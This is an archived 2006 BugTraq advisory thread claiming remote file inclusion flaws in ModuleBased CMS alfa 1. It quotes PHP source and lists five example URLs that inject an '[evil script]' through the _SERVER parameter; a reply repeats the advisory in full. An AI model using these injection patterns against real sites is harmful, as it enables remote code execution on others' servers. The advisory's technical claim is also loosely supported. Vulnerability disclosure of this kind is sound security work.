BugTraq
Back to list
|
Post reply
ModuleBased CMS alfa 1 Multiple Remote File Inclusion
Aug 29 2006 04:41PM
amir scorpino yahoo com
(1 replies)
+ModuleBased CMS(MBCMS) multiple remote file Inclusion
+discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website.
+version:alfa 1
+vendor site:http://sourceforge.net/projects/mbcms/
+
+discovered by: ScorpinO
+location:IRAN/ANZALI
+sites: WwW.ScorpinO.NeT Www.deltahacking.iR
+email:amir.scorpino (at) yahoo (dot) com [email concealed]
+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......
+
+discovered in avatar.php archive.class.php login.php profile.class.php process.php
+
+
/admin/avatar.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php");
include($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
$profile = new Profile();
$q = mysql_query("SELECT avatar FROM users WHERE username='".$_SESSION['username']."'");
$r = mysql_fetch_assoc($q);
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/archive.class.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
class Archive{
function AllArchives(){
$q = mysql_query("SELECT * FROM posts") or die (mysql_error());
while ($r = mysql_fetch_assoc($q)){
if($r['topic'] == 1)
$topic = "News";
if($r['topic'] == 2)
$topic = "Articles";
echo $topic;
$q = mysql_query("SELECT * FROM posts WHERE topic='".$r['topic']."'") or die (mysql_error());
while($r_posts = mysql_fetch_assoc($q))
echo $r_posts['post'];
}
}
}
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/login.php
<?php
if($_POST['login']){
include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php");
$user = new User();
$user->login($_POST['username'], $_POST['pass']);
}
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/profiles.class.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/profile/proccess.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+exploit:
+
+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]
++
[ reply ]
Re: ModuleBased CMS alfa 1 Multiple Remote File Inclusion
Sep 02 2006 12:00AM
Carsten Eilers (ceilers-lists gmx de)
Privacy Statement
Copyright 2010, SecurityFocus
+discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website.
+version:alfa 1
+vendor site:http://sourceforge.net/projects/mbcms/
+
+discovered by: ScorpinO
+location:IRAN/ANZALI
+sites: WwW.ScorpinO.NeT Www.deltahacking.iR
+email:amir.scorpino (at) yahoo (dot) com [email concealed]
+special tnx to:Dr.trojan,HIV++,D_7J,Vampire,......
+
+discovered in avatar.php archive.class.php login.php profile.class.php process.php
+
+
/admin/avatar.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/profile.class.php");
include($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
$profile = new Profile();
$q = mysql_query("SELECT avatar FROM users WHERE username='".$_SESSION['username']."'");
$r = mysql_fetch_assoc($q);
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/archive.class.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
class Archive{
function AllArchives(){
$q = mysql_query("SELECT * FROM posts") or die (mysql_error());
while ($r = mysql_fetch_assoc($q)){
if($r['topic'] == 1)
$topic = "News";
if($r['topic'] == 2)
$topic = "Articles";
echo $topic;
$q = mysql_query("SELECT * FROM posts WHERE topic='".$r['topic']."'") or die (mysql_error());
while($r_posts = mysql_fetch_assoc($q))
echo $r_posts['post'];
}
}
}
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/login.php
<?php
if($_POST['login']){
include_once($_SERVER[DOCUMENT_ROOT]."/libs/user.class.php");
$user = new User();
$user->login($_POST['username'], $_POST['pass']);
}
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/profiles.class.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php"); ?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/libs/profile/proccess.php
<?php
include_once($_SERVER[DOCUMENT_ROOT]."/libs/config.php");
?>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+exploit:
+
+http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script]
+http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script]
++
[ reply ]